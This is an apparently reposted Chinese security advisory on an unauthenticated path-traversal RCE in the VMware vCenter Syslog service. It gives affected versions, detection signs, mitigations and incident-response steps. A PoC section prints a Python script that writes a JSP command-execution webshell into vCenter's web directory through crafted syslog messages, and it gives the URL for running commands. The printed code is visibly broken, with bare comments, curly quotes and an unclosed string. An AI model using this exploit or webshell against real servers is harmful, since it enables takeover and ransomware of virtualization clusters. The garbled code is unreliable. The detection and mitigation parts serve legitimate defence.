文章总结: VMwarevCenterSyslog服务存在未授权目录遍历远程代码执行漏洞CVE-2026-59310,攻击者可构造恶意Syslog报文利用路径穿越写入webshell实现未授权RCE,影响vCenterServer8.0、9.0、9.1多个版本。建议优先升级补丁,收紧514端口访问控制,加强文件监控与日志审计,疑似入侵需立即断网并排查后门。
综合评分: 85
文章分类: 漏洞预警,应急响应,漏洞分析
【高危漏洞预警】VMware vCenter Syslog服务未授权目录遍历远程代码执行漏洞CVE-2026-59310
飓风网络安全
2026年9月27日 23:32
新疆
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
一、漏洞描述
vCenter内置Syslog日志接收服务对传入日志报文内的路径参数校验存在缺陷。攻击者可构造特殊Syslog报文,利用../路径穿越字符,绕过目录限制,向服务器本地任意路径写入文件。
vCenter底层为Photon OS,攻击者通过写入JSP/Java代码到Web应用目录,访问该Web文件即可实现未授权远程代码执行。
攻击链路:
未授权网络访问 → 恶意Syslog报文发送 → 路径穿越写入webshell → Web访问触发代码执行 → 拿下vCenter管理员权限,横向控制ESXi集群。
攻击特点:无需账号密码、无用户交互、低复杂度,可自动化批量扫描利用,勒索团伙拿到vCenter权限后加密虚拟机、窃取虚拟化资产数据。
二、影响版本
• vCenter Server 8.0:早于 8.0 U3k
• vCenter Server 9.0:早于 9.0.2.0100
• vCenter Server 9.1:早于 9.1.0.0300
• 衍生产品:VMware Cloud Foundation、vSphere Foundation、Telco Cloud Platform 对应内嵌vCenter版本受影响
修复版本
升级至:
vCenter 8.0 U3k / 9.0.2.0100 / 9.1.0.0300 及以上版本
三、检测方法(企业自查)
- 版本自查
登录vCenter,查看版本号,匹配上述受影响清单。
- 端口探测
vCenter Syslog服务默认监听 UDP/TCP 514,部分环境启用TLS 6514。
若公网开放514端口,风险极高。
- 流量特征检测
• 源IP发送大量畸形syslog报文,报文内包含../路径穿越字符串
• 短时间内向vCenter写入陌生jsp文件
• 大量陌生Web访问请求,访问临时jsp文件
- 主机侧审计
Photon OS 检查 /var/log/vmware/、/usr/lib/vmware-vsphere-ui/server/work/deployer-sample/ 目录下新增jsp文件。
四、缓解方案(未打补丁临时防护)
-
网络隔离:ACL禁止公网访问vCenter 514/6514端口,仅可信内网日志源访问Syslog端口。
-
防火墙限制:仅允许已知日志采集服务器IP访问Syslog端口。
-
关闭不必要Syslog接收功能,不需要远程syslog采集则直接关闭该服务。
-
监控告警:新增文件写入告警,重点监控vCenter Web目录新增jsp文件。
-
优先升级补丁,临时防护仅过渡,不能完全替代官方补丁。
五、漏洞利用说明 & PoC
⚠️ 仅授权靶场环境使用,未经授权扫描、攻击属于违法。
原理:构造syslog报文,通过路径穿越将JSP Webshell写入vCenter Web目录,随后HTTP访问触发代码执行。
!/usr/bin/env python3
CVE-2026-59310 PoC (Only for authorized lab test)
VMware vCenter Syslog Directory Traversal -> Write JSP -> RCE
import socket
import sys
def send_syslog_payload(target_ip, target_port, payload_content):
Syslog报文头 + 路径穿越payload,写入vsphere-ui web目录
路径:../../usr/lib/vmware-vsphere-ui/server/work/deployer-sample/evil.jsp
syslog_msg = f”<13>Aug 28 10:00:00 test {payload_content}”
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))
sock.sendall(syslog_msg.encode())
sock.close()
print(“[+] Payload sent, try access https://{}/ui/evil.jsp”.format(target_ip))
if __name__ == “__main__”:
if len(sys.argv) != 2:
print(“Usage: python poc.py
sys.exit()
ip = sys.argv[1]
port = 514
JSP webshell payload
traversal_path = “../../usr/lib/vmware-vsphere-ui/server/work/deployer-sample/evil.jsp”
jsp_shell = ‘<%@page import="java.lang.Runtime"%><%Runtime.getRuntime().exec(request.getParameter("cmd"));%>‘
payload = f”FILE:{traversal_path}\n{jsp_shell}”
send_syslog_payload(ip, port, payload)
使用方式(靶场)
-
在隔离靶场部署受影响vCenter
-
执行脚本发送payload
-
浏览器访问 https://vcenter/ui/evil.jsp?cmd=id 执行系统命令
限制说明:不同vCenter版本Web部署目录存在差异,部分版本需要调整写入路径;TCP/UDP端口差异需要切换socket类型。
六、应急响应处置(如果疑似被入侵)
-
立即断开vCenter对外网络,防止横向扩散到ESXi主机
-
备份vCenter日志,取证:syslog服务日志、web访问日志、文件变更审计日志
-
查杀Web目录内jsp后门、恶意脚本
-
重置vCenter、ESXi所有管理员账号密码
-
排查虚拟机是否存在勒索加密、数据窃取
-
完成取证后,升级vCenter到修复版本,加固ACL策略
七、总结
CVE-2026-59310是高危未授权RCE漏洞,野外已经被勒索团伙利用。vCenter作为虚拟化集群核心管理节点,一旦被拿下,整个虚拟化平台全部受控。
建议运维:
-
优先梳理全网vCenter资产,确认版本
-
公网vCenter立即收紧514端口访问
-
尽快完成补丁升级,同步日志审计、文件监控能力
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:飓风网络安全 《【高危漏洞预警】VMware vCenter Syslog服务未授权目录遍历远程代码执行漏洞CVE-2026-59310》